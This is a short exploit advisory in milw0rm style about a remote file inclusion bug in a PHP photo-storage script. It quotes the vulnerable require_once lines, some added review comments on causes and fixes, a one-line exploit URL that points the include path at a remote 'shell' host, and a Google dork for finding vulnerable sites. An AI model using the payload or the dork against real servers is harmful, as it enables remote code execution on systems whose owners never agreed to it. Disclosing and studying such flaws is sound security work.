########################################################################
|
|
# magic photo storage website -- Remote File Inclusion
|
|
# Vendor : http://www.scriptaty.net/magic-photo-storage-website.html
|
|
# Demo Site : http://www.turnkeydemos.info/demo/picstorage/
|
|
# Found By : k1tk4t - k1tk4t[4t]newhack.org
|
|
# Location : Indonesia -- #newhack[dot]org @irc.dal.net
|
|
########################################################################
|
|
file;
|
|
common_function.php
|
|
|
|
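bug; (the include prefix $_config['site_path'] is used below without any assignment shown in this file, so a direct request to the script leaves it to whatever populated the variable)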
|
|
// Excerpt of include/common_function.php as quoted by the advisory.
// Each include path is prefixed with $_config['site_path']; no assignment of
// $_config appears in the excerpt, so the prefix is not fixed by this file.
// NOTE(review): presumably only exposed where register_globals turns request
// parameters into variables and allow_url_include / allow_url_fopen permits
// URL wrappers in require_once -- confirm against the deployed php.ini.
// Mitigation: derive the base path inside the script (dirname(__FILE__) or a
// constant defined by the entry point), refuse direct requests to files under
// /include/, and keep register_globals and allow_url_include disabled.
require_once $_config['site_path'] . '/class/session.class.php';
|
|
require_once $_config['site_path'] . '/class/validator.class.php';
|
|
require_once $_config['site_path'] . '/include/message.php';
|
|
########################################################################
|
|
exploit;
|
|
http://localhost/include/common_function.php?_config[site_path]=http://shell
|
|
########################################################################
|
|
Dork;
|
|
allinurl:catalog_login.php
|
|
########################################################################
|
|
Thanks;
|
|
str0ke
|
|
xoron [www.xoron.biz]
|
|
[mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159
|
|
evilcode,illibero,NoGe,nyubi,x-ace,ghoz,
|
|
home_edition2001,matdhule,iFX,fusion
|
|
and for all(friend's&enemy)
|
|
@irc.dal.net
|
|
#newhack[dot]org [all member&staff]
|
|
#e-c-h-o [all member echo community]
|
|
#asiahacker [all member asiahacker community]
|
|
#nyubicrew [all member solpotcrew community] <-- at irc.komp-uter.org
|
|
|
|
# milw0rm.com [2007-01-08]